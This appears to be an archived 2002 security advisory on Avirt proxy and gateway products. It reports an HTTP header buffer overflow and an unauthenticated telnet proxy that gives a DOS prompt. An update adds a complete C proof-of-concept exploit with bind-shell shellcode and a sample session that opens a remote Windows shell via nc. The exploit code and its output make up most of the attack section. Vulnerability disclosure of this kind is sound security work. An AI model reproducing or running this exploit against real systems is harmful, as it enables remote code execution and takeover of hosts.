TUCoPS :: Security App Flaws :: win5008.htm

Avirt proxy and gateway suites holds buffer overflows and allows remote access
18th Jan 2002 [SBWID-5008]
COMMAND

	Avirt proxy and gateway suites holds buffer overflows and allows  remote
	access

SYSTEMS AFFECTED

	 Avirt SOHO v4.2

	 Avirt Gateway v4.2

	 Avirt Gateway Suite v4.2

	

PROBLEM

	In Strumpf Noir Society advisory [http://labs.secureance.com] :
	

	 Buffer Overflow

	 ===============

	

	The problem appears to be due to incorrect bounds  checking  in  regards
	to the  header  fields  for  the  standard  HTTP  proxy  (port  8080  by
	default).  If  these  headers  exceed  the  2319  bytes  in  size,   the
	corresponding buffer will overflow.
	

	Besides allowing for a DoS  attack  against  a  vulnerable  system  this
	could be exploited to  execute  arbitrary  code  on  the  host,  EIP  IS
	overwritten. These  Avirt  products  run  as  a  NT  system  service  by
	default.
	

	 Remote access

	 =============

	

	The Avirt Gateway technology integrated in the Gateway  Suite  contains,
	amongst others, a telnet proxy. Due to an error  in  the  implementation
	of this proxy inside the Gateway Suite however, the system on  which  it
	is installed will be effectively turned into an insecure telnet server.
	

	To exploit this flaw, an attacker would  only  have  to  telnet  to  the
	telnet proxy (running on port 23  by  default  installation)  and  could
	then browse the  system\'s  file  structure  using  the  \'dir\'  and/or
	\'ls\' commands. Typing \'dos\' after connecting to the  target  machine
	would drop the attacker in a dos prompt. No authentication  is  required
	except for using an ip-address which is in one of the  proxy\'s  allowed
	ranges.
	

	 Update (14 February 2002)

	 ======

	

	Exploit code :
	

	

	Avirt Gateway 4.2  remote buffer overflow: proof of concept

	

	Release Date:

	February 12, 2002

	

	Systems tested:

	Avirt Gateway v4.2 [build 4807] on Windows 2000, SP2

	

	These products can be found at vendor Avirt\'s web site:

	http://www.avirt.com

	

	Description:

	The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely=20

	exploitable buffer overflow which allows execution of arbitrary code.=20

	Entering a String of about 510bytes at the =84Ready>=93 prompt will=

	 overwrite EIP.

	Exploit will bind a shell to a specified port on the attacked host.

	

	Example:

	bash-2.05$ agate 10.0.0.1 7007

	

	Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)

	

	initialising socket

	...initialized

	trying to connect

	...connected

	(waiting)

	sending exploit

	...sent

	(waiting)

	...closed

	shell bound to port 7007

	bash-2.05$ nc -v target 7007

	target [10.0.0.1] 7007 (?) open

	Microsoft Windows 2000 [Version 5.00.2195]

	(C) Copyright 1985-2000 Microsoft Corp.

	

	C:\\>

	

	

	Exploit:

	-----------------------------------cut---------------------------------------------------------

	/* agate.c by uid0x00

	  * Avirt Gateway 4.2 remote exploit

	  * compile with gcc agate.c -o agate

	  *

	  * tested with win2k, sp2

	  *

	  * thx to ByteRage, exploit is based on his shellcode

	  */

	

	/* Set the following three defines according to the DLL we use */

	

	// MSVCRT.DLL version 6.10.8924.0 (win2K)

	#define LoadLibraryRefNEG \"\\x30\\xCF\\xFC\\x87\"

	#define GetProcAddressRefADD \"\\xFC\"

	#define newEIP \"\\x60\\x32\\xFA\\x74\" // Should JMP/CALL EBX

	

	#include <stdio.h>

	#include <sys/errno.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	

	int main(int argc, char *argv[]) {

	   int s;

	   struct sockaddr_in SockAdr;

	   char exploit[1024];

	   unsigned short int      a_port;

	

	   char shellcode[] =3D

	

	/* =3D=3D=3D=3D SHELLC0DE START =3D=3D=3D=3D */

	/* shellcode based on ByteRage\'s 450byte code (thx for your help man!) */

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x06\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\xEB\\x06\\x90\\x90\"newEIP\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xE8\\xFF\\xFF\\xFF\\xFF\"

	\"\\xC0\\x5E\\xAC\\x84\\xC0\\x75\\xFB\\x8B\\xFE\\x33\\xC9\\xB1\\xC1\\x4E\\x80\\x36\\x99\\xE2\\xFA\\xBB\"LoadLibraryRefNEG

	\"\\xF7\\xDB\\x56\\xFF\\x13\\x95\\xAC\\x84\\xC0\\x75\\xFB\\x56\\x55\\xFF\\x53\"GetProcAddressRefADD\"\\xAB\\xAC\"

	\"\\x84\\xC0\\x75\\xFB\\xAC\\x3C\\x21\\x74\\xE7\\x72\\x03\\x4E\\xEB\\xEB\\x33\\xED\\x55\\x6A\\x01\\x6A\\x02\\xFF\"

	\"\\x57\\xE8\\x93\\x6A\\x10\\x56\\x53\\xFF\\x57\\xEC\\x6A\\x02\\x53\\xFF\\x57\\xF0\\x33\\xC0\\x57\\x50\\xB0\\x0C\"

	\"\\xAB\\x58\\xAB\\x40\\xAB\\x5F\\x55\\x57\\x56\\xAD\\x56\\xFF\\x57\\xC0\\x55\\x57\\xAD\\x56\\xAD\\x56\\xFF\\x57\"

	\"\\xC0\\xB0\\x44\\x89\\x07\\x57\\xFF\\x57\\xC4\\x8B\\x46\\xF4\\x89\\x47\\x3C\\x89\\x47\\x40\\xAD\\x89\\x47\\x38\"

	\"\\x33\\xC0\\x89\\x47\\x30\\x66\\xB8\\x01\\x01\\x89\\x47\\x2C\\x57\\x57\\x55\\x55\\x55\\x6A\\x01\\x55\\x55\\x56\"

	\"\\x55\\xFF\\x57\\xC8\\xFF\\x76\\xF0\\xFF\\x57\\xCC\\xFF\\x76\\xFC\\xFF\\x57\\xCC\\x55\\x55\\x53\\xFF\\x57\\xF4\"

	\"\\x93\\x33\\xC0\\xB4\\x04\\x50\\x6A\\x40\\xFF\\x57\\xD4\\x96\\x6A\\x50\\xFF\\x57\\xE0\\x8B\\xCD\\xB5\\x04\\x55\"

	\"\\x55\\x57\\x51\\x56\\xFF\\x77\\xAF\\xFF\\x57\\xD0\\x8B\\x0F\\xE3\\x18\\x55\\x57\\x51\\x56\\xFF\\x77\\xAF\\xFF\"

	\"\\x57\\xDC\\x0B\\xC0\\x74\\x21\\x55\\xFF\\x37\\x56\\x53\\xFF\\x57\\xF8\\xEB\\xD0\\x33\\xC0\\x50\\xB4\\x04\\x50\"

	\"\\x56\\x53\\xFF\\x57\\xFC\\x55\\x57\\x50\\x56\\xFF\\x77\\xB3\\xFF\\x57\\xD8\\xEB\\xB9\\xFF\\x57\\xE4\\xD2\\xDC\"

	\"\\xCB\\xD7\\xDC\\xD5\\xAA\\xAB\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xF0\\xE9\\xFC\\x99\\xDE\\xFC\\xED\\xCA\"

	\"\\xED\\xF8\\xEB\\xED\\xEC\\xE9\\xD0\\xF7\\xFF\\xF6\\xD8\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\"

	\"\\xFC\\xEA\\xEA\\xD8\\x99\\xDA\\xF5\\xF6\\xEA\\xFC\\xD1\\xF8\\xF7\\xFD\\xF5\\xFC\\x99\\xC9\\xFC\\xFC\\xF2\\xD7\"

	\"\\xF8\\xF4\\xFC\\xFD\\xC9\\xF0\\xE9\\xFC\\x99\\xDE\\xF5\\xF6\\xFB\\xF8\\xF5\\xD8\\xF5\\xF5\\xF6\\xFA\\x99\\xCE\"

	\"\\xEB\\xF0\\xED\\xFC\\xDF\\xF0\\xF5\\xFC\\x99\\xCB\\xFC\\xF8\\xFD\\xDF\\xF0\\xF5\\xFC\\x99\\xCA\\xF5\\xFC\\xFC\"

	\"\\xE9\\x99\\xDC\\xE1\\xF0\\xED\\xC9\\xEB\\xF6\\xFA\\xFC\\xEA\\xEA\\x99\\xB8\\xCE\\xCA\\xD6\\xDA\\xD2\\xAA\\xAB\"

	\"\\x99\\xEA\\xF6\\xFA\\xF2\\xFC\\xED\\x99\\xFB\\xF0\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\"

	\"\\xFA\\xFC\\xE9\\xED\\x99\\xEA\\xFC\\xF7\\xFD\\x99\\xEB\\xFC\\xFA\\xEF\\x99\\x99\\x9B\\x99\\x82\\xA1\\x99\\x99\"

	\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\xFA\\xF4\\xFD\\x99\\x0D\\x0A\";

	/* =3D=3D=3D=3D SHELLC0DE ENDS =3D=3D=3D=3D */

	

	   printf(\"\\nAvirt Gateway 4.2 remote exploit by uid0x00=20

	(uid0x00@haked.com)\\n\\n\");

	

	   if(argc < 3) {

	     printf(\"usage:\\t%s <ip#> <port#>\\n\", argv[0]);

	     return 0;

	   }

	

	   //insert shell port

	   a_port =3D htons(atoi(argv[2]));

	   a_port^=3D 0x9999;

	   shellcode[964] =3D (a_port) & 0xff;

	   shellcode[965] =3D (a_port >> 8) & 0xff;

	

	   //init the exploit buffer

	   memset(&exploit, \'\\xCC\', 0x200);

	   memcpy(&exploit, &shellcode, sizeof(shellcode)-1);

	

	   printf(\"initialising socket\\n\");

	   s =3D socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

	   if (s) {

	     printf(\"...initialized\\n\");

	

	     memset(&SockAdr, 0, sizeof(SockAdr));

	     SockAdr.sin_addr.s_addr =3D inet_addr(argv[1]);

	     SockAdr.sin_family =3D AF_INET;

	     SockAdr.sin_port =3D htons(23);

	

	     printf(\"trying to connect\\n\");

	     if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {

	       printf(\"...connected\\n\");

	       printf(\"(waiting)\\n\");

	       sleep(3);

	

	       printf(\"sending exploit\\n\");

	       send(s, exploit, sizeof(exploit), 0);

	       printf(\"...sent\\n\");

	

	       printf(\"(waiting)\\n\");

	       sleep(3);

	

	       printf(\"...closed\\nshell bound to port %s \\n\", argv[2]);

	       close(s);

	     }

	     else {

	       printf(\"... failed :( errno =3D %i\\n\", errno);

	       close(s);

	       return(0);

	     }

	   }

	}

	-----------------------------------cut---------------------------------------------------------

	

	Disclaimer:

	The information within this paper may change without notice. Use of this

	information constitutes acceptance for use in an AS IS condition. There are

	NO warranties with regard to this information. In no event shall the author

	be liable for any damages whatsoever arising out of or in connection with

	the use or spread of this information. Any use of this information is at the

	user\'s own risk.

	

	Copyright Information:

	Permission is hereby granted for the redistribution of this paper

	electronically. It is not to be edited in any way without express consent of

	the author. If you wish to reprint the whole or any part of this alert in any

	other medium excluding electronic medium, please e-mail uid0x00@haked.com for

	permission.

	

	uid0x00

	EOF

	

	

SOLUTION

	None yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH